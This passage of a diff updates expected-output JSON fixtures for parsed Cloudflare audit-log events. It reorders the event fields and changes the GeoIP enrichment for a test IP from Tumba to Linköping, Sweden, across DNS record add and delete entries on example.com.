"{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"ab8dd3c6-fecd-4360-a3e2-6177520a428b\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"alt4.gmr-smtp-in.l.google.com\",\"id\":\"e80fa3d2167cfcaf172201e46c79c004\",\"name\":\"example.com\",\"priority\":40,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065339\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:44.409826Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "ab8dd3c6-fecd-4360-a3e2-6177520a428b", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -1824,21 +1839,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776166034Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"ab8dd3c6-fecd-4360-a3e2-6177520a428b\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"alt4.gmr-smtp-in.l.google.com\",\"id\":\"e80fa3d2167cfcaf172201e46c79c004\",\"name\":\"example.com\",\"priority\":40,\"proxied\":false,\"ttl\":1,\"type\":\"MX\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065339\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:44.409826Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "ab8dd3c6-fecd-4360-a3e2-6177520a428b", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1866,14 +1866,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1885,6 +1885,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389088154Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"99461ef3-1cfc-4cc9-9430-6ec2fa7a597f\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"connect.domains.google.com\",\"id\":\"a56b790a1293bdb5b4aeb88e23f1679a\",\"name\":\"_domainconnect.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"CNAME\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065345\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:41.639476Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "99461ef3-1cfc-4cc9-9430-6ec2fa7a597f", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -1912,21 +1927,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776168786Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"99461ef3-1cfc-4cc9-9430-6ec2fa7a597f\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"connect.domains.google.com\",\"id\":\"a56b790a1293bdb5b4aeb88e23f1679a\",\"name\":\"_domainconnect.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"CNAME\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065345\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:41.639476Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "99461ef3-1cfc-4cc9-9430-6ec2fa7a597f", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -1954,14 +1954,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -1973,6 +1973,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389088530Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"7e104142-b328-4e8f-94a1-ed0f1ffa87fb\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"95627e007af5aa70fe6c96fb6667a803\",\"name\":\"test.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065342\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:33.480205Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "7e104142-b328-4e8f-94a1-ed0f1ffa87fb", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -2000,21 +2015,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776171421Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"7e104142-b328-4e8f-94a1-ed0f1ffa87fb\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"95627e007af5aa70fe6c96fb6667a803\",\"name\":\"test.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065342\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:33.480205Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "7e104142-b328-4e8f-94a1-ed0f1ffa87fb", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2042,14 +2042,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -2061,6 +2061,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389088929Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"1c2275b1-3d4d-46bf-8bb9-28c37f37976c\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"f25062e118b2ae5a7380b94b7144cca4\",\"name\":\"test2.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065354\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:27.804305Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "1c2275b1-3d4d-46bf-8bb9-28c37f37976c", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -2088,21 +2103,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776174058Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"1c2275b1-3d4d-46bf-8bb9-28c37f37976c\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"f25062e118b2ae5a7380b94b7144cca4\",\"name\":\"test2.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065354\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:27.804305Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "1c2275b1-3d4d-46bf-8bb9-28c37f37976c", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2130,14 +2130,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -2149,6 +2149,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389089302Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"ee6731f1-6c28-43b6-a711-ea035d622a83\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"18d1bbe795d5803f63ce12332c989074\",\"name\":\"another.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065351\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:23.918098Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_del", + "id": "ee6731f1-6c28-43b6-a711-ea035d622a83", + "type": [ + "deletion" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -2176,21 +2191,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776176659Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_del\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"ee6731f1-6c28-43b6-a711-ea035d622a83\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"oldValue\":\"\",\"oldValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"18d1bbe795d5803f63ce12332c989074\",\"name\":\"another.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_id\":\"u3fp685o1wjk5zq6hxa6a53oh49u3ek2\",\"zone_name\":\"example.com\"},\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065351\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:19:23.918098Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_del", - "id": "ee6731f1-6c28-43b6-a711-ea035d622a83", - "type": [ - "deletion" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2218,14 +2218,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -2237,6 +2237,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389089689Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"9d043524-edf8-4693-8262-56578930d98a\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"f25062e118b2ae5a7380b94b7144cca4\",\"name\":\"asdf.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065354\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883896Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "9d043524-edf8-4693-8262-56578930d98a", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -2263,21 +2278,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776179254Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"9d043524-edf8-4693-8262-56578930d98a\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"f25062e118b2ae5a7380b94b7144cca4\",\"name\":\"asdf.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065354\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883896Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "9d043524-edf8-4693-8262-56578930d98a", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2305,14 +2305,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -2324,6 +2324,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389090070Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"086acb98-9d2b-4c3b-9c6b-9cb00c04a995\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"18d1bbe795d5803f63ce12332c989074\",\"name\":\"tbh.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065351\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883815Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "086acb98-9d2b-4c3b-9c6b-9cb00c04a995", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -2350,21 +2365,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776181840Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"086acb98-9d2b-4c3b-9c6b-9cb00c04a995\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"18d1bbe795d5803f63ce12332c989074\",\"name\":\"tbh.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065351\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883815Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "086acb98-9d2b-4c3b-9c6b-9cb00c04a995", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2392,14 +2392,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -2411,6 +2411,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389090454Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"706053a5-7283-47da-b070-681a38d42e74\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"1a04a1819461ae1c88f910631c5bc3e3\",\"name\":\"stuff.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065348\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883723Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "706053a5-7283-47da-b070-681a38d42e74", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -2437,21 +2452,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776184472Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"706053a5-7283-47da-b070-681a38d42e74\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"1a04a1819461ae1c88f910631c5bc3e3\",\"name\":\"stuff.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065348\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883723Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "706053a5-7283-47da-b070-681a38d42e74", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2479,14 +2479,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -2498,6 +2498,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389090818Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"1b3c5168-31ee-41ce-a8a3-0a99198ba8c9\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"connect.domains.google.com\",\"id\":\"a56b790a1293bdb5b4aeb88e23f1679a\",\"name\":\"_domainconnect.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"CNAME\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065345\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883628Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "1b3c5168-31ee-41ce-a8a3-0a99198ba8c9", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -2524,21 +2539,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776187082Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"1b3c5168-31ee-41ce-a8a3-0a99198ba8c9\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"connect.domains.google.com\",\"id\":\"a56b790a1293bdb5b4aeb88e23f1679a\",\"name\":\"_domainconnect.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"CNAME\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065345\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883628Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "1b3c5168-31ee-41ce-a8a3-0a99198ba8c9", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2566,14 +2566,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -2585,6 +2585,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389091193Z", + "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"455dfac9-4a49-41dd-93d3-63a5aee919b1\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"95627e007af5aa70fe6c96fb6667a803\",\"name\":\"bob.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065342\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883551Z\"}", + "provider": "UI", + "kind": "event", + "action": "rec_add", + "id": "455dfac9-4a49-41dd-93d3-63a5aee919b1", + "type": [ + "creation" + ], + "category": [ + "configuration" + ], + "outcome": "success" + }, "cloudflare": { "audit": { "actor": { @@ -2611,21 +2626,6 @@ } } }, - "event": { - "ingested": "2021-12-13T14:40:20.776189671Z", - "original": "{\"action\":{\"result\":true,\"type\":\"rec_add\"},\"actor\":{\"email\":\"user@example.com\",\"id\":\"enl3j9du8rnx2swwd9l32qots7l54t9s\",\"ip\":\"89.160.20.156\",\"type\":\"user\"},\"id\":\"455dfac9-4a49-41dd-93d3-63a5aee919b1\",\"interface\":\"UI\",\"metadata\":{\"zone_name\":\"example.com\"},\"newValue\":\"\",\"newValueJson\":{\"content\":\"89.160.20.156\",\"id\":\"95627e007af5aa70fe6c96fb6667a803\",\"name\":\"bob.example.com\",\"proxied\":true,\"ttl\":1,\"type\":\"A\",\"zone_name\":\"example.com\"},\"oldValue\":\"\",\"owner\":{\"id\":\"eojhfbg334i88zs2pr2rd7wr82jf2h95\"},\"resource\":{\"id\":\"10715065342\",\"type\":\"DNS_record\"},\"when\":\"2021-08-09T10:14:17.883551Z\"}", - "provider": "UI", - "kind": "event", - "action": "rec_add", - "id": "455dfac9-4a49-41dd-93d3-63a5aee919b1", - "type": [ - "creation" - ], - "category": [ - "configuration" - ], - "outcome": "success" - }, "user": { "email": "user@example.com", "id": "enl3j9du8rnx2swwd9l32qots7l54t9s" @@ -2653,14 +2653,14 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "SE-AB", - "city_name": "Tumba", + "region_iso_code": "SE-E", + "city_name": "Linköping", "country_iso_code": "SE", "country_name": "Sweden", - "region_name": "Stockholm", + "region_name": "Östergötland County", "location": { - "lon": 17.8167, - "lat": 59.2 + "lon": 15.6167, + "lat": 58.4167 } }, "as": { @@ -2672,6 +2672,21 @@ "address": "89.160.20.156", "ip": "89.160.20.156" }, + "event": { + "ingested": "2021-12-14T14:41:11.389091572Z", + 